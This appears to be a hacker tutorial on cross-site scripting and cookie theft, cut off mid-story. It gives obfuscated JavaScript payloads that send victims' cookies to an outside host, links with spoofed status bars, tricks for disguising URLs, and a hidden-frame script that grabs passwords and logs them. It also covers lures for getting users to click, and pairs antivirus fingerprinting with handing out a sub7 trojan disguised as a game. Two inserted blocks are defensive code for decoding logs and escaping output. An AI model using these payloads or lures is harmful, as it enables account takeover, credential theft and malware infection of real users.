try the same trick where you go to a 404 file on yahoo
it won't print the < and > characters. But if you
were to find a script on yahoo that printed out < and
> you could easily do this =) And there are scripts
on yahoo.com which are vuln to cross site scripting,
a few have been reported to bugtraq and I found another
one.
So how would you get users to visit these urls? Try things
like:
"Yeah all you redlite players, check out this hidden pick,
funny as hell: Check this page out!" Or better yet, load it in a frame
that is 0% large. The user won't even know what hit them
=)
oh, the source for that redlite link is: <a href="http://www.redlite.org/signup/signup2.php?username=<script
type=text/javascript>var u = String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);u
%2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A);u
%2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0062);u %2B= String.fromCharCode(0x0030);u
%2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x0072);u
%2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003F);u
%2B= document.cookie;document.location.replace(u);</script>"
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true" onMouseOut="window.status='';return true"> Check
this page out! </a>
notice the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true"
and
onMouseOut="window.status='';return true"
at the end. This is to trick the user into thinking that
the link leads somewhere else. Again, this is using javascript
to manipulate what the user sees in order to trick them.
Another script in the edge engine that is vulnerable to
cross site scripting is board.php. Here is the exploit:
http://www.site.com/board.php?search= var u =
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u
%2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u
%2B=
String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u
%2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u
%2B=
String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u
%2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u
%2B=
String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u
%2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u
%2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u
%2B=
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u
%2B=
String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u); &did=edge0
sure am glad bsrf doesn't run it ;-)
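On the defending side, the same payload turns up in the web server's access log in exactly this encoded form. The following is an added example written for this tutorial (not the author's code): it rebuilds the string a String.fromCharCode chain assembles and flags a request that also reads document.cookie or redirects. The log lines are constructed samples, not real traffic.

```javascript
// Added example (not from the tutorial): a log-review helper that rebuilds
// the string a String.fromCharCode(...) chain assembles, so the payload
// shown above can be read in plain text and flagged.

// One String.fromCharCode(<hex or decimal code>) call.
const CHAR_CALL = /String\.fromCharCode\(\s*(0x[0-9a-f]+|\d+)\s*\)/gi;

// Pull the request path out of a Common Log Format line.
function requestPath(logLine) {
  const m = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(logLine);
  return m ? m[1] : null;
}

// Rebuild the text a chain of fromCharCode calls produces. Number() accepts
// both the 0x0068 form used in the payload and plain decimal codes.
function decodeFromCharCodeChain(text) {
  let out = '';
  for (const m of text.matchAll(CHAR_CALL)) out += String.fromCharCode(Number(m[1]));
  return out;
}

// Analyse one log line: percent-decode the path (so %2B= becomes += and
// %3Cscript%3E becomes <script>), rebuild the hidden string, and note what
// the script does with it.
function analyzeLogLine(logLine) {
  const path = requestPath(logLine);
  if (path === null) return { path: null, rebuilt: '', suspicious: false };
  let text;
  try { text = decodeURIComponent(path); } catch (e) { text = path; }
  const rebuilt = decodeFromCharCodeChain(text);
  const readsCookie = /document\.cookie/i.test(text);
  const redirects = /location\.(replace|href|assign)|window\.location/i.test(text);
  const hasScriptTag = /<\s*script\b/i.test(text);
  const suspicious = hasScriptTag || (rebuilt.length > 0 && (readsCookie || redirects));
  return { path, rebuilt, readsCookie, redirects, hasScriptTag, suspicious };
}

// Constructed sample lines (not real traffic). The first carries the
// "http://site.com/a.cgi?" chain from the text above; the second is benign.
const SAMPLE_LOG_LINE =
  '198.51.100.7 - - [12/Mar/2002:10:15:32 +0000] "GET /vulnscript.cgi?q=' +
  '%3Cscript%3Evar%20u=String.fromCharCode(0x0068);u%2B=String.fromCharCode(0x0074);' +
  'u%2B=String.fromCharCode(0x0074);u%2B=String.fromCharCode(0x0070);u%2B=String.fromCharCode(0x003A);' +
  'u%2B=String.fromCharCode(0x002F);u%2B=String.fromCharCode(0x002F);u%2B=String.fromCharCode(0x0073);' +
  'u%2B=String.fromCharCode(0x0069);u%2B=String.fromCharCode(0x0074);u%2B=String.fromCharCode(0x0065);' +
  'u%2B=String.fromCharCode(0x002E);u%2B=String.fromCharCode(0x0063);u%2B=String.fromCharCode(0x006F);' +
  'u%2B=String.fromCharCode(0x006D);u%2B=String.fromCharCode(0x002F);u%2B=String.fromCharCode(0x0061);' +
  'u%2B=String.fromCharCode(0x002E);u%2B=String.fromCharCode(0x0063);u%2B=String.fromCharCode(0x0067);' +
  'u%2B=String.fromCharCode(0x0069);u%2B=String.fromCharCode(0x003F);' +
  'u%2B=document.cookie;document.location.replace(u);%3C/script%3E HTTP/1.0" 200 512';
const BENIGN_LOG_LINE =
  '203.0.113.9 - - [12/Mar/2002:10:16:01 +0000] "GET /vulnscript.cgi?q=hello+world HTTP/1.0" 200 512';

// Example run for the reader.
for (const line of [SAMPLE_LOG_LINE, BENIGN_LOG_LINE]) {
  const r = analyzeLogLine(line);
  console.log(r.suspicious ? 'SUSPICIOUS' : 'ok', r.rebuilt || '(no fromCharCode chain)');
}
```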
So how can a coder stop this vulnerability? I would say
never print user inputted data back to the user. Also
filter out < and >, and unpack (decode) all url encoding before
filtering input. I found a way to steal cookies in the
old ikonboard using profile.cgi. Although it wasn't
too big a deal, since there were more serious holes in ikonboard,
it was still bad programming practice to print unfiltered
input. Now ikonboard does not use profile.cgi, it doesn't
print inputted data to the screen, and it filters data.
Usually web based email scripts are very vulnerable
to cross site scripting, and that holds true for a vulnerability
in solution script's alais-mail script that I found last
year.
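The fix described above, as an added example (not code from the tutorial): decode url encoding first, then escape every character that can open markup, instead of stripping only ' and " the way the redlite script did. The weakFilter, safeEcho and containsLiveTag helpers and the sample input are constructed here for illustration.

```javascript
// Added example, not from the tutorial: how a script that echoes user input
// should treat it. The weak filter (quotes only) is shown next to the
// proper fix (decode first, then HTML-escape everything that can open markup).

// Decode nested percent-encoding until it stops changing, so a payload sent
// as %253Cscript%253E cannot slip past a filter that only decodes once.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { return current; }
    if (next === current) return current;
    current = next;
  }
  return current;
}

// What the vulnerable signup script effectively did: drop ' and " and echo
// the rest. A quote-free fromCharCode payload passes straight through.
function weakFilter(input) {
  return input.replace(/['"]/g, '');
}

// Escape every character that can open a tag, attribute or entity.
function htmlEscape(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#47;' };
  return input.replace(/[&<>"'\/]/g, ch => map[ch]);
}

// The safe way to echo a query value: decode, then escape for HTML output.
function safeEcho(rawQueryValue) {
  return htmlEscape(fullyDecode(rawQueryValue));
}

// Crude check used only to show the difference: is a script tag still live?
function containsLiveTag(html) {
  return /<\s*script\b/i.test(html);
}

// Constructed sample: the quote-free payload shape from the text above.
const SAMPLE_INPUT =
  '%3Cscript%3Evar%20u=String.fromCharCode(0x0068);u%2B=document.cookie;' +
  'document.location.replace(u);%3C/script%3E';

console.log('weak filter leaves a live tag:', containsLiveTag(weakFilter(fullyDecode(SAMPLE_INPUT))));
console.log('escaped output:', safeEcho(SAMPLE_INPUT));
```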
A few other problems with javascript and cookie stealing:
http://www.peacefire.org/security/hmattach/
- A hotmail exploit. Hotmail didn't filter
javascript and allowed .html attachments to be viewed
rather than downloaded.
http://www.securityspace.com/exploit/exploit_1b.html
http://www.peacefire.org/security/iecookies/
- Opening the cookie jar, remote cookie viewer.
Using %2F instead of / makes ie think it's an intranet
site.
http://homepages.paradise.net.nz/~glineham/cookiemonster.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp
- Actually active scripting, not javascript.
Then there are the new about:// and file content reading
vulns in ie that have recently been posted to bugtraq.
I plan on discussing these in detail when I update this
tutorial.
Most people say to me, "but no one with any clue about
security is going to click on the link which has javascript
to steal cookies" and this is true when the plain url
is http://site.com/vulnscript.cgi? document.location.replace('http://hacker.com/logger.php?'
+ document.cookie); That is why we need to trick them
into thinking the url isn't dangerous. Here is one way:
Obscuring urls:
One way of tricking a user into clicking a link they thought
led somewhere else was to use that onmouseover trick
to make the url look like it is pointing somewhere else.
Obviously you cannot use this on protocols that
do not support html or that completely block javascript
and onmouseover. So instead of http://site.com you can
have http://127.0.0.1. This might not help too much, so
how about we use a little trick. When browsers log in to
.htaccess directories they can use the following syntax:
http://username:password@site.com
You'll see why this is important in a minute. Without
the password you can have things like:
http://username@site.com
and it will work fine. It will try to log in to site.com
with the username = 'username' and no password. Now what
happens if there is no .htaccess file? Then it doesn't
matter what the username or password is, and the page
loads normally. So something like this could be used:
http://microsoft.com/site/dir/helpdesk.asp@site.com
You see how this could be used to get people to click
on a link thinking it leads somewhere else? Even if it
is in plain text many people will believe this link goes
to microsoft.com. Now that we have a link let's obscure
it a bit =)
There are many different ways to obscure urls from users
to help aid you in tricking them. One of them involves
converting ip addresses into their decimal equivalents.
I am not going to cover this, but there are plenty of
other tutorials on the net where you can learn. I'll just
let you use this script to automatically convert ip addresses
to the decimal value.
Now use this instead of site.com and you get something
like:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
[insert nasty javascript url encoded here]
Now that does not look like http://site.com/a.cgi?[nasty
javascript], which would make it very clear to users what it is
doing. Let's go over the steps one more time, just to be
sure you got it. First make up any site name (it doesn't
have to be a valid url):
http://aol.com/scripts/userid.jsp?
Add a @ to the end:
http://aol.com/scripts/userid.jsp?@
Then the ip address of the host in decimal form:
http://aol.com/scripts/userid.jsp?@3639550308
Then the rest of the path in url encoding:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
Also url encode the javascript and put it at the end.
This is just one method of obscuring the url; there are
others.
Ok, this method will not be used very often, and isn't
too valuable a skill to the average hacker, but it can
come in very handy. This was originally a news post on
my site, but it fits into this tutorial nicely. I know
that this part might be very poorly explained and many
people won't understand how it works. But I have tried
to at least make it so people with advanced javascript
knowledge can make some sense of how the attack works.
Also note that this attack is purely theory; I have not
used this against an actual site yet. It might even be
used against sites which require you to fill in a form
to login, which means hotmail, yahoo, and 100,000,000 other
sites, but it would require extra coding, some of which
I am not sure is possible.
Ok, in this article I will explain how to steal info from
users by using javascript.
What this exploit requires is: a script that prints info
you want into an input field, and the script doesn't
check the referrer.
The most used reason for this would be to get usernames
and passwords from sites. An example of this would be
cyberarmy.com which was vulnerable to this for a long time.
You will notice that if we did have the user's cookie
we could have simply viewed this page and gotten
their password, but cyberarmy was pretty secure in not
printing unescaped data to the user's browser.
Now we will be doing this:
1 main page with 2 frames.
frame #1 - will look like a normal page and will steal
the info from frame #2.
frame #2 - will load the page in a hidden frame.
this is what the main page will look like:
-------- begin --------
<html>
<script language="JavaScript"><!--
document.write('<frameset cols="10%,*" frameborder="yes" framespacing="0" border="3">');
// for the example we are using cols="10%,*" but in a real
// life attack you would use cols="0px,*" or something, so
// as to hide the frame that is stealing the form value.
document.write('<frame src="fuckca.html" scrolling="no" noresize name=blah>');
document.write('<frame src="userconfig.html" scrolling="auto" noresize name=vulnscript>');
document.write('<\/frameset>');
// You might be wondering why I used javascript to print
// the <frameset>. This was done so we can print more
// javascript on the page (the javascript that steals the
// form value).
printhtml(0);
function printhtml(counter){
  if (counter == 0) {
    // run a second time after 11 seconds, once the frame has loaded
    var the_timeout = setTimeout("printhtml(1);", 11000);
    counter++;
  }
  var thehtml = window.vulnscript.document.all.tags('HTML')[0].innerHTML;
  window.vulnscript.document.open("text/html");
  window.vulnscript.document.writeln(thehtml.substring(0, thehtml.indexOf('RAID</A>') + 8));
  window.vulnscript.document.writeln('--><script language="javascript">');
  window.vulnscript.document.writeln('location.replace("http://www.cyberarmy.com/zebulun/userconfig.pl");');
  window.vulnscript.document.writeln('<\/script><!--');
  window.vulnscript.document.writeln(thehtml.substring(thehtml.indexOf('<TABLE border=0 cellPadding=0 cellSpacing=3 width=90%>') - 1, thehtml.indexOf('</html>') + 7));
  window.vulnscript.document.close();
}
//--> </script> </html>
-------- end --------
Of course in real use the size of the cols would be set
so frame #2 (vulnscript) would be 0%, so that the user
wouldn't even know what is happening.
Now this is what the fuckca.html is:
-------- begin --------
<html><body>
<script type="text/javascript"> <!--
var name1 = parent.vulnscript.document.forms[0].pass1.value;
parent.blah.document.write(name1);
//--> </script> </body></html>
-------- end --------
All this does is print out the value of the pass1 field of the
first (unnamed) form from the frame named vulnscript (the one
that has the page we want to steal data from).
This is what their userconfig.pl displayed that we were
grabbing:
Password : <INPUT TYPE="password" SIZE=45 NAME="pass1"
MAXLENGTH=16 value="testpass">
The problem is that it would display the password in plain
text (value="testpass" - testpass is the password). Why
it did this I don't know, stupid programming I guess.
But if you got a hold of someone's cookie you could view
that script and it would give you the pass. So what this
little trick with frames and javascript does is make users
visit the page without knowing and then lets our javascript
grab their password. Instead of printing the password
to frame #1 (name=blah) we could have sent an invisible
frame to a script which logs input. Example:
instead of
parent.blah.document.write(name1);
have
parent.vulnscript.location.replace('log.cgi?' + name1);
I would then tell a few people who I want passwords from
about this page, say "hey, want to see a picture of my
girlfriend?" (All hackX0r guys like pics of girls) then
I would just put up some stupid pic, maybe Britney Spears
or something. The log.cgi would log both name1 (their
password) and $ENV{'REMOTE_ADDR'} (their ip address).
This would let me match up usernames to passwords fairly
easily. You could also get their username by grabbing
it off the page, or from the contents of the cookie.
This attack is fairly complicated, so I didn't explain
why I did a few things. I figure anyone who could actually
pull this off would understand why. Also not many sites
are vuln to this, and even for the ones that are, usually the
attacker does not have the ability to hop on the irc channel
and trick people into viewing it.
Ok, this is probably the least likely technique in this
tutorial to be used. All the rest can be used fairly
often. This one is used to gain enough info on someone
in order to form a trojan attack on them. What this javascript
will allow us to do is to probe their system and see if
they have any security against our attack. It will let
us see what anti-virus program they use, what firewall
they use, and if they have any programs that allow us
to infect them with macros.
This was originally a bugtraq post ( http://www.securityfocus.com/archive/1/224673
) with a link to the example at http://geocities.com/dzzie/sys_snoop1.html
but we are going to probe for more security related
programs. (put a probe for anti-virus programs, firewalls,
word, adobe acrobat [pdf])
Let's say we check for anti-virus programs. If they don't
have any you can display a link to download sub7 and say
it is a video game... if they do have an anti-virus program
you can display the link to the real game. This way you
don't have to worry about the user finding out that you
tried to send them a trojan. Only users who don't have
an anti-virus program will have downloaded the trojan.
One possible future for trojans is modules that you can
insert to attack specific programs. For instance if you
know the user is running a certain type of anti-virus
program and they are running a certain type of firewall
you can plug those modules into the trojan. When the
user downloads and runs this trojan the modules will trojan
that anti-virus and firewall, making them seem as if they
are running fine, when they aren't. Either they won't
detect your trojan or they will be replaced with an empty
program that just puts the icons in the taskbar and task
list. I will try to get a working demonstration of how
javascript can be used to download the correct trojan
for a user's system or detect if the trojan will be detected
by an anti-virus program so it will make them download
a regular file.
If you have a firewall or anti-virus program please send
me the full address (absolute address) to all the images
it has. Email the list to b0iler@hotmail.com. What the
javascript will do is try and load that image; if it does
then ie will return a true value, if it doesn't ie will
return false and we will know the user does not have that
software installed. When I get enough info on the main
anti-virus and main firewalls I will put together the
code and explain it better.
This section isn't really done, but I am getting sick
of writing so I guess I'll have to finish it later. All
I am going to do is add a demo of how to check for anti-virus
programs.
I have decided to add a section here of a few interesting
javascript hacks I have heard about and seen. Since normal
web site defacements and such are full of script kiddies
who just ./own site.com with no creativity or thought,
I like to hear a nice story of hackers coming up with
cool ways to manipulate systems and people.
First story is about a webgame called redlite
(taken from a tutorial I wrote a few weeks ago)
What happened was that a friend of mine found his first
exploit and with the help of someone else coding it
got it to work really well. Before I continue with the
story you'll need to know a little bit about the situation.
In #b0g on us.undernet.org, a place where I hang out sometimes,
there are a lot of people into this online game called redlite.
The object of the game is to fight people in an
online version of a drug war. You have crack, hoes, guns,
money, and the like. Now a few days prior to this I was
about to sign up for it just to see what all the fuss
was about; as I was signing up I saw that the registration
script prints what is inputted to it. The script also
didn't filter anything but ' and " from the input, so
it could be used to steal cookies from users. I coded
up the exploit and tested it... everything worked fine.
But I never found out if you can do anything with just
a user's cookie. And I didn't really care about the game,
so the exploit never really got used. When I went back
into #b0g xhaze and tak, two redlite players and b0g gimps,
had found another script that prints something to a page.
The page that it prints to is their player